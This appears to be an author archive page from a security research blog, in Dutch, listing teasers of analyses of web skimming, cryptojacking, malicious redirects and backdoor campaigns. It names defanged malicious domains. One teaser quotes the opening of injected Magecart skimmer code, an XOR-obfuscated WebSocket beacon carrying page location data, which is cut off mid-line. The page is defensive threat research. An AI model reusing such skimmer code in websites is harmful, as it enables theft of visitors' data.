Articles by Himanshu Anand
CryptoJacking is dood: lang leve CryptoJacking
Modern cryptojacking is uitgegroeid tot een stille, meerfasige aanval.
Himanshu AnandMagecart richt zich op Oost-Aziatische e-commercewebsites op OpenCart
We hebben een Magecart-achtige aanval gedetecteerd gericht op het OpenCart CMS-platform
Himanshu AnandHoe traffic hijacking en affiliatefraude websites en gebruikers kunnen schaden
Traffic hijacking is wanneer iemand stiekem verandert waar de links van een website naartoe gaan, zodat bezoekers naar andere sites worden gestuurd.
Himanshu AnandIs vertrouwen op Indicators of Compromise veilig genoeg?
De meeste beveiligingsprogramma's vertrouwen vandaag de dag nog sterk op Indicators of Compromise (IOC's). Deze aanpak slaagt er niet in bedreigingen te detecteren die langzaam evolueren, infrastructuur hergebruiken, of actief zijn in smalle, hoogwaardige contexten zoals client-side web skimming.
Himanshu AnandCoinMarketCap Client-Side Aanval: Een Uitgebreide Analyse
Op 20 juni 2025 werd CoinMarketCap (CMC) - een hoeksteen van het cryptocurrency-ecosysteem, waarop miljoenen mensen vertrouwen voor realtime crypto-data - getroffen door een ernstig beveiligingsincident.
Himanshu AnandBewapende Google OAuth activeert kwaadaardige WebSocket
Een aanvaller gebruikt 'Google.com' om eigen code te leveren en uit te voeren via een bewapende Google OAuth-aanval.
Himanshu AnandMeedogenloze aanvallen aan de clientzijde gericht op meerdere platforms met ClickFix
In dit artikel bespreken we een recente ClickFix-variant die zich nu richt op macOS, Android en iOS, met behulp van browsergebaseerde omleidingen, valse UI-prompts en zelfs drive-by-downloadtechnieken.
Himanshu AnandChinese Volwassenenoplichting Richt Zich op Mobiele Gebruikers via PWA
We hebben een nieuwe injectiecampagne geïdentificeerd die misbruik maakt van JavaScript van derden om gebruikers door te sturen.
Himanshu AnandMeer dan 150.000 websites getroffen door volledige pagina-kaping met links naar Chinese goksites
We schatten dat ongeveer 150.000 websites zijn getroffen door deze campagne. Het script definieert een reeks trefwoorden gerelateerd aan weddenschappen, gokken en casinomerken, zowel in het Engels als in het Chinees.
Himanshu AnandDuizenden websites getroffen door vier backdoors in aanval via JavaScript van derden
Tijdens het analyseren van bedreigingen gericht op WordPress-frameworks ontdekten we een aanval waarbij één enkel JavaScript-bestand van een derde partij werd gebruikt om vier afzonderlijke backdoors te injecteren in 1.000 gecompromitteerde websites via cdn.csyndication[.]com/.
Himanshu AnandMeer dan 35.000 websites doelwit van volledige paginakaping die linkt naar een Chinees gokplatform
Een nieuwe malwarecampagne heeft meer dan 35.000 websites gecompromitteerd door een kwaadaardig script te injecteren vanaf de hieronder vermelde websites. Zodra het script laadt, kaapt het het browservenster van de gebruiker volledig—en leidt het hen vaak door naar pagina's die een Chinees gokplatform (of casino) promoten.
Himanshu AnandMeer dan 10.000 WordPress-websites verspreiden malware voor macOS en Windows
We identificeerden meer dan 10.000 WordPress-sites die een nep-Google-browserupdate tonen die leidt tot malwaredownloads.
Himanshu AnandOverheids- en universiteitswebsites doelwit van ScriptAPI[.]dev client-side aanval
Gisteren ontdekten we een nieuwe client-side JavaScript-aanval gericht op +500 websites, waaronder overheden en universiteiten. De geïnjecteerde scripts creëren verborgen links in het Document Object Model (DOM), die verwijzen naar externe websites, een programmeerinterface voor webdocumenten.
Himanshu AnandDe kosten van valse positieven - hoe wij een doelwit werden
Deze week identificeerden we een intrigerende use case met betrekking tot de WP3[.]XYZ-aanval (link naar onze blogpost). Het wekte interesse in de hele community en leidde tot betere detectiepercentages op platforms zoals VirusTotal (VirusTotal link). Hoewel de meesten onze inspanningen waardeerden, bekritiseerden anderen ons omdat we de hoofdoorzaak niet identificeerden of diensten aanbevalen om gehackte websites op te schonen. Desondanks willen we de community bewust maken van potentiële aanvallen en beloven we het in de toekomst nog beter te doen. Wanneer vals
Himanshu AnandMeer dan 5.000 WordPress-sites getroffen door WP3[.]XYZ malware-aanval
We hebben een wijdverspreide malware-campagne ontdekt die zich richt op WordPress-websites en meer dan 5.000 sites wereldwijd treft. Het kwaadaardige domein: \"https://wp3.xyz/plugin[.]php\".
Himanshu AnandNieuw aanval met 3rd party JS-script ontdekt: Artifyau[.]com en Quantifymy[.]com
Deze week hebben we een gespecialiseerde crawler ingezet voor onderzoeksdoeleinden. Binnen slechts 24 uur identificeerde deze met succes nieuwe Magecart-aanvalspatronen. Magecart is een geavanceerde, financieel gemotiveerde dreiging die kwaadaardige JavaScript injecteert om persoonlijke betalingsinformatie te stelen. Hier is een overzicht van de grootste Magecart-aanvallen tot nu toe. Eerste detectie: Geobfusceerde JavaScript op Artifyau[.]com Gedetecteerde URL: https://artifyau[.]com/T1M0dVluVnBiR1J6YVhSbGNISnZMbU52YlE9PQ/jqwery.js. De URL imiteert een
Himanshu AnandNieuwe Magecart-aanvalscode onthuld
Op 14 oktober plaatsten we een artikel over een nieuwe Magento Magecart-aanval die gaande was. Destijds viel ons slechts één script op als de boosdoener. Vandaag konden we de aanval gedetailleerder vinden en analyseren. De aanval gedecodeerd Dit was de geïnjecteerde code: <script> const qbq = [93,89,89,16,5,5,77,89,94,75,94,70,73,4,69,88,77,5,64,67,92,69,21,89,69,95,88,73,79,23]; const zep = 42; window.sss = new WebSocket(String.fromCharCode(...qbq.map(hwo => hwo ^ zep)) + encodeURIComponent(location.h
Himanshu AnandKoeweit e-commerce site wordt gebruikt om client-side skimming aanvallen te faciliteren
Een populaire e-commerce site in Koeweit, draaiend op een verouderde versie van Magento (2.4), is gecompromitteerd door een kwaadaardige JavaScript injectie,
Himanshu AnandCisco client-side Magecart JavaScript-aanval
Weer een dag, weer een spraakmakende client-side JavaScript-aanval. Vanochtend lazen we dat Cisco het volgende slachtoffer is van kwaadaardige code die wordt
Himanshu AnandWeb supply chain-aanval via getrojaniseerde jQuery op npm, GitHub en CDN's
Aanvallen zijn gevonden in getrojaniseerde jQuery op GitHub, npm en jsDelivr in een nieuwe web supply chain-aanval. Elk pakket had een kopie van jQuery
Himanshu Anand